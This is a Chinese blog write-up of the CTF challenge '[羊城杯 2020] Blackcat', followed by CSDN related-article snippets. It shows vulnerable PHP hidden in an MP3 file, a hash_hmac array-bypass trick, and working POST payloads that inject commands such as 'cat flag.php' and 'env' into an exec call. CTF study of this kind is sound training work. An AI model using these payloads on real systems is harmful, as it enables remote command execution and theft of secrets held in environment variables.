[羊城杯 2020]Blackcat

最新推荐文章于 2024-03-13 22:25:39 发布
最新推荐文章于 2024-03-13 22:25:39 发布
阅读量504 收藏 1
点赞数
分类专栏: Buuctf刷题篇 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/126476687
版权

在这里插入图片描述

不用怀疑,整首歌真的只是黑猫警长

歌下载下来,010查看最后面发现代码

在这里插入图片描述

<?php
if (empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])) {
    die();
}
$clandestine = getenv("clandestine");
if (isset($_POST['White-cat-monitor']))
    $clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if ($hh !== $_POST['Black-Cat-Sheriff']) {
    die();
}
echo exec("nc" . $_POST['One-ear'])

还是很好理解的,就是两次 hmac加密,第一次秘钥是 环境变量,第二次秘钥则是 第一次的结果

最后如果两次加密后结果 与我们输入的相等,则执行后面的命令

这里提一下 hash_hmac() 的一个漏洞,如果 data是数组,就会返回错误,返回 NULL,这样就绕过了我们不知道环境变量的问题

所以最后的加密结果也是可以预见的

<?php
$clandestine = hash_hmac('sha256', array(), 'abc');
$hh = hash_hmac('sha256', '123;cat flag.php', $clandestine);
echo $hh;
# 7efffe428751e95b44dde414dbe2fb37d1fcf44887881dd0c179fb7f7ddbd075

payload

White-cat-monitor[]=1
&One-ear=123;cat flag.php
&Black-Cat-Sheriff=7efffe428751e95b44dde414dbe2fb37d1fcf44887881dd0c179fb7f7ddbd075

在这里插入图片描述

恶心,这个是假 flag,真 flag在 env里,麻了

White-cat-monitor[]=1
&One-ear=123;env
&Black-Cat-Sheriff=2484dd802be98dc3dd9df9513fb681e68257505ce55bf7d79d4778142fed24f9

在这里插入图片描述

paidx0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[羊城 2020]black cat - 文件隐写+RCE(hash_hmac绕过)
oZuoShen123的博客
10-10 535
这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor 这里有3个if,首先第一个肯定绕过; 第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空 第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行 特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
BUUCTF--[羊城 2020]Blackcat
qq_46263951的博客
08-19 1086
进入后查看源码发现提示都说听听歌了! 下载Hei_Mao_Jing_Chang.mp3文件,使用命令strings Hei_Mao_Jing_Chang.mp3查看文件 在文末看到一段PHP代码 if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){ die(' $clandestine = getenv("clandestine"); if(isset($_POST['White-cat-monitor'..
Blackcat-WordPress资源付费主题
11-06
Blackcat是一款专为WordPress设计的资源付费主题,旨在帮助网站所有者通过提供付费内容来实现盈利。这款主题具有丰富的功能和高度的定制性,能够满足各种类型资源网站的需求,包括但不限于教程、电子书、视频课程、...
BlackCAT
03-20
BlackCAT 是一个基于 JavaScript 的工具或项目,从标题来看,可能是开发者个人用于特定目的的工具,由于描述中提到“纯自用,无维护”,意味着它可能并非为公共使用而设计,也不提供持续的更新或技术支持。...
WordPress付费会员制虚拟资源下载网站主题Blackcat.rar
01-07
WordPress付费会员制虚拟资源下载网站主题Blackcat 该主题是基于简约实用的主题选项框架 Codestar Framework进行开发的功能强大的付费会员制主题,该主题尤其适合用于搭建付费下载资源网站,比如素材站、软件站、...
blackcat_website
03-27
"blackcat_website"项目似乎是一个基于JavaScript的网站开发项目,主要文件名为"blackcat_website-main"。这个项目可能是一个个人或团队为了展示其技术能力、创建一个特定功能的网站或者是一个教学示例而构建的。...
每日练习-[羊城 2020]Blackcat
m0_68113265的博客
09-04 173
下载mp3文件,010打开末尾有代码提示。
[NSSCTF][羊城2020]WEB复现
cosmoslin的博客
03-13 5264
easycon 考点:一句话,base64转图片 访问index.php,提示eval post cmd,应该是有一句话,直接蚁剑连接 里面有一个bbbbbbbbb.txt,打开发现是一串base64编码 发现是jpg头,base64转图片即可 easyphp 考点:.htaccess <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){
2020羊城、第六届工控比赛部分题目复现
m0re's blog
09-17 2522
本文目录羊城easyconBlackCat工控签到ICS_1ICS_4ICS_10ICS_12 羊城 easycon 环境打开 dirsearch扫描得到两个可以访问的文件 一个是index.html、另一个是index.php访问index.php会有个弹窗,看到 题目中提示菜刀。所以猜测这个是连接密码。 使用蚁剑连接,成功连接。 但是,那个bbbbbbb.txt没有flag,是base64转图片,使用在线网站可以直接转换得到图片,这个是需要加上一个头的,缺少图片头的格式。 BlackCa
羊城Web题总结与复现
qwzf
09-14 2840
0x00 前言 总结一下羊城的Web题,就做出几道。发现有的题是原题改的,不过涉及到一些没有学过的知识,简单总结一下。 0x01 easycon 考点:一句话木马+base64转图片 打开题目,发现是Apache默认页,使用扫描工具扫描一下 发现index.php,访问发现弹窗eval post cmd,意思很明显,就是post传入cmd参数,并且应该使用了eval()函数。所以,源码里应该有<?php eval($_POST['cmd']);?>,一句话木马,蚁剑直接连 发现上图所示的这
【刷题总结3.11--1.18】
最新发布
qq_74240553的博客
03-13 690
ctf刷题
2020羊城CTF随缘Writeup
sash1mi
01-09 3609
2020羊城CTF随缘Writeup docker源码链接: https://github.com/k3vin-3/YCBCTF2020 Web部分 a_piece_of_java 考点:源码审计、java反序列化 PS:这道题没整明白,直接给出官方WP 第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接: DatabaseInfo databaseInfo = new DatabaseInfo(); databaseInfo.setHost("x.x.x.x"); datab
BlackcatUSB 5101E:多功能Flash编程器教程
1. **软件要求**:手册强调了在使用Blackcat USB时所需的基本软件支持,包括最新的Release Candidate 15,用户需要访问嵌入式计算机网()获取最新版本的驱动程序和相关文档。 2. **支持的Flash内存设备列表**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值